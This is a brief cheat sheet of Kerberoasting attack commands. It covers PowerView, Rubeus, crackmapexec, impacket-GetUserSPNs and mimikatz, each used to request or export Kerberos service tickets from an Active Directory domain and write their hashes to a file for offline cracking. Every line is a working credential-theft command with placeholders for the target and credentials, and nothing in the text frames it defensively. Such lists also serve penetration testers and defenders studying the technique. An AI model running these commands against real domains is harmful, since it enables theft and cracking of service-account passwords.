#Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
#From memory to disk
kerberos::list /export